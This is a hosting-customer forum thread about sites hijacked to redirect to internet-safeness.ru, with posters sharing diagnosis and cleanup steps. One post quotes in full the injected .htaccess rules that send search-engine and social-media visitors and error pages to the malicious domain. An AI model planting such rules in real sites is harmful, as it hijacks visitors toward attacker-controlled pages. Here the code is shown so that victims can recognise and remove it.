Security issue!- Site redirecting (internet-safeness.ru)

wordpress

#1

Help asap please!!!

I run a PHPBB forum. Hosted on Dreamhost. As the the domain name.

Approximately an hour ago whilst on the site, everytime i tried to go to a topic or post, i was redirected to google with the tranistory domain address www.internet-safeness.ru appearing in the address bar mid jump.

It doesnt appear to effect the admin area of the phpbb forum!!!

Any help please. Its a relatively small forum (2500 members with 500-600 active daily) but it has a small focus and is missed.

Is this a domain name issue, a dreamhost issue, a phpbb issue??? Has the site been hacked??


#2

We are just customers here. We can’t really give you any input if you don’t tell us what your domain name actually is.


#3

No problem.

Domain is:

www.ulsterbandsforum.net


#4

looks like you put it into maintenance mode. i can’t really test it. if anything though its a phpbb issue. you have probably been compromised. i would do a fresh install of the latest version. if it was some sort of injection attack i doubt your mysql database has been tampered with so you can just reuse the database. might try to look for any changes recently to the php files maybe.


#5

Thanks. Though two other domains i have on dreamhost are having the same problem so it doesnt look like its a phpbb issue. One site uses joomla and the other wordpress


#6

if you use filezilla i’ve heard there is a windows worm that steals ftp passwords. I don’t have other info thats basically from another recent thread on this forum.[hr]
found it: http://discussion.dreamhost.com/thread-130909.html


#7

I havent done any ftp with filezilla in many many months. But thanks for the feedback.

I cannot get any answers about this at all.


#8

you might want to check for the invisible image after the body tag being talked about over in that other thread.


#9

If you find that you have an img tag immediately following your body tag or some sort of redirection script, please report it here (this sounds like it is related):

Also, please let us know when the first hack took place and by what IP address.

This is likely the result of a compromised FTP username/password. I would suggest changing your password immediately. Also, your local computer may have been compromised by a worm that stole the file you keep the passwords stored in (i.e. Filezilla, CuteFTP, etc). Use only SFTP and do not store your passwords with these kinds of programs.


#10

Check all your .htaccess files for modification. My sites have just been hacked this week that got in through an exploit in a wordpress theme and modified ALL my .htaccess files in the root of ALL my sites to redirect to a malicious site in russia (.ru). You’ll have to find where they’re getting in and lock it down, because they’ll keep coming back.

The redirect only happens under certain conditions, such as when someone clicks on your site in Google or Yahoo.

The embedded rewrite rules are not easily spotted upon first glance, but make sure you scroll, and you’ll find it.


#11

This is more than a changed htaccess file. Given the info provided it is likely these are all related based on the information provided. I have been going back and forth with the Dreamhost security team, a painful experience to say the least, to determine the hole as I have now discovered that three of my ftp accounts on three different dreamhost accounts (these are client accounts) have all been hacked exactly the same way. Dreamhost takes a very litigious user error approach to handling security questions (i.e. your code probably has vulnerabilities and is likely to blame - given this is likely true for most hacks).

I have worked through every possible attack vector and have narrowed it down to compromised FTP accounts. There are a number of ways this can happen but I have determined in my case that it is most likely due one of two things:

  1. An infected local machine that had it’s password file stolen from an FTP program (i.e. Filezilla, CuteFTP, etc.). Although, I have scanned my local computer and it reveals nothing.

  2. A compromise of Dreamhost’s security where the attacker was able to access the user/pass of various FTP accounts within Dreamhost’s system (it appears that passwords for FTP accounts are not encrypted within Dreamhost’s system).

Can you guys run a “last” scan on your logs to see if any IP’s other than your own have accessed your account since Aug 7? If so, post the log here.

If you do not know how to do this, I will post followup instructions later this afternoon.


#12

If you have been hacked, please run a “last” scan on your logs to see what IP’s other than your own have accessed your account? If so, post the log here. This will help determine if we were hacked because of a security compromise on Dreamhost’s server or not. I asked Dreamhost security department for help in figuring this out but was told they have well over a million accounts and manage thousands of servers and as such the system administrators may not be able to readily answer this.

Following are instructions on running a “last” scan to see what IP address have logged in using your FTP account:

  1. In the dreamhost panel, click on “manage user” and edit your ftp account changing it to a “shell account”.

  2. download a shell program such as “PuTTy” which can be downloaded for free at: http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

  3. Login via PuTTY. You will put your web server for the host name. You can get this from the “Account Status” dropdown under “Your Web Server”. So, it is says “XYZ” is your webserver, then under “Host Name” in PuTTY you would put “xyz.dreamhost.com”. Click “Open” and it will prompt you for a user name and pass.

  4. After you have logged in, type the following two lines replacing USERNAME with the username of your Shell/FTP account and hit return after each line. The first line will show who has logged in your FTP account within the last 30 days. The second line will show the previous 30 days.

last -i | grep USERNAME
last -if /var/log/wtmp.1 | grep USERNAME

If it comes back with no info and just another prompt, try taking off a letter at the end of your username and try again (ie. “USERNAME”, 2nd try “USERNAM”). Keep doing this until it returns the log.


#13

Also, keep in mind that, if you have multiple domains hosted under the same user, it’s quite common that an PHP vulnerability on one of your sites will end up modifying files which are under other sites. This won’t show up as a login at all, since it’s just a PHP script.


#14

Yes, a PHP vulnerability issue is very common hack vector and probably the majority of hack cases submitted to Dreamhost are a result of this. Also, if they hack one site and install say a shell script, they can hack any other site under the same account.

My hacked situation this week is not a PHP vulnerability which is why I have posted here to the forums to see if any others have had the same hack. All three of my hacked sites were under not just under different FTP accounts but also under three differend dreamhost accounts.

I have confirmed the FTP accounts were accessed by the same hacker (same IPs, times, dates). There are no shell scrips or the like. Only, injected code. They used some sort of automated script to place the initial injection test code on all of the sites all at the same time. The only common thread to these accounts are me (or my local computer) and Dreamhost. So I am thinking compromised local machine or compromised Dreamhost FTP system. In terms of my local machine, scans reveal nothing and all of the other sites I have on other hosting companies have not been hacked. Only a few on Dreamhost.

I have been with Dreamhost for 10 years and as such have probably 70-90 sites hosted here for various clients. I’d rather not move them as that would be a major pain. It would just be great to know for sure which one was the source of the hole so I or Dreamhost can plug it up.


#15

Sounds like a similar problem I’ve had in the last few days, and maybe coming from the same source. Dreamhost alerted me that there had been a breach on a WP site hosted here, and attempts to view or access my site redirected to a .ru domain. My WP site was a personal blog that I didn’t use much, so I didn’t have a problem killing the site. I deleted the content of the site AND killed the database as well, then tried a fresh WP install and new MySQL database install as well. I can log into the WP admin panel, but if I click on “Appearance” or “Dashboard” or try to install theme, it redirects me to "http://safenesscontent.ru/s4one/index.php." I’m not particularly an expert at the hosting thing, and partially chose DreamHost b/c of one-click WP install, though I have played around with files, etc. I should also note that bc of the 1-click install, I never used an FTP client for that site, just adjusted from the WP admin panel. However, I did have a Drupal install on another site that I have used an FTP client for. Still need to wade through that one…


#16

Hmmm, so actually it would be safer for each domain to be set up as a separate user then?
[hr]

[quote=“rob_la, post:14, topic:55845”]
So I am thinking compromised local machine or compromised Dreamhost FTP system. In terms of my local machine, scans reveal nothing and all of the other sites I have on other hosting companies have not been hacked.[/quote]

If someone was determined to steal passwords via a worm, it might be effective to delete the vector once the task was accomplished rather than leaving it behind for someone to discover, analyse, and create a way of preventing attacks in future…

Just a thought.[hr]

[quote=“Dickman91, post:15, topic:55845”]
I should also note that bc of the 1-click install, I never used an FTP client for that site, just adjusted from the WP admin panel.[/quote]

Unless you use https, whenever you log into your WP admin panel, your username and password are being sent unencrypted. Once that admin panel is compromised, you can install a plugin such as ‘add from server’ or modify a theme to get access to anything within that user account.


#17

I had an extension that forced https for logins, but I hadn’t actually logged in to the WP site in any way (via web admin panel or ftp) since early June, and the breach was maybe three days ago. Still not sure how to clean this up, especially after a fresh install of WP and MYSQL DB on that domain. Where could the breach be if that doesn’t clear it out?


#18

I’m having the “internet-safeness.ru” problem on some of my Wordpress hosted sites, and others I’m not (thank god)

the few that are seem to have been infected through Dreamhost FTP, not on my end.

It only happens when I go to plugins and ADD plugins… I’ve replaced all those files with fresh ones, but I’m not going to replace the entire WP-ADMin folder since I’m not sure which file is scuffing it up (nor do I have time to search for it)

This one is pretty crafty.[hr]
Jesus… all this running around and I find the MAIN .htaccess file of my main user has this crap in it:

																													ErrorDocument 400 http://internet-safeness.ru/team/index.php																														
																													ErrorDocument 401 http://internet-safeness.ru/team/index.php																														
																													ErrorDocument 403 http://internet-safeness.ru/team/index.php																														
																													ErrorDocument 404 http://internet-safeness.ru/team/index.php																														
																													ErrorDocument 500 http://internet-safeness.ru/team/index.php																														
																													<IfModule mod_rewrite.c>																														
																													RewriteEngine On																														
																													RewriteCond %{HTTP_REFERER} .*google.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*ask.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*baidu.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*youtube.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*qq.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*excite.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*altavista.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*msn.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*netscape.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*aol.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*goto.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*mamma.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*lycos.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*search.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*bing.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*facebook.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*twitter.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*blog.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*live.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*myspace.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*mail.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*yandex.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*rambler.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*ya.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*aport.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*flickr.*																														
																													RewriteRule ^(.*)$ http://internet-safeness.ru/team/index.php [R=301,L]																														
																													</IfModule>

#19

Wow. Ok, this is me being ignorant, but how do I get to the .htaccess file?


#20

Not ignorant at all! You’ll need an FTP program. I use Cyberduck, but they all should have a VIEW “hidden files” it will be called .htaccess up top. You will have to duplicate the file, then change the name to htaccess.txt to download and edit it. When fooling with htaccess you always want to keep the backup and rename it something like 3htaccess or something too.

Hope that makes sense. I’ll report if I get this fixed.

First thing you should do is change your FTP password before doing all of this.

I’m guessing from the looks of those rewrite codes it’s been keylogging every one of those sites listed. BUMMER!!![hr]
BOOYAH!!! I’m happy to report that on the two sites I was having issues with, it WAS the .htaccess file. As soon as I deleted that and put a blank one in place, site works fine and all is well.

The most important thing here is to use a better password. I thought I had a pretty darn good one, but sometimes machines figure em out. I doubt it was anything on Dreamhost’s end-- I’ve been with them since 2002 and have never had these problems. Fucking hackers are getting more sophisticated looking for loopholes, etc. Now I gotta be weary to change ALL of any of the passwords from any of those sites listed too since 7am yesterday. Which luckily isn’t many.

You can reward me for this fix by reading my comics at http://bigfootandtiki.com :slight_smile: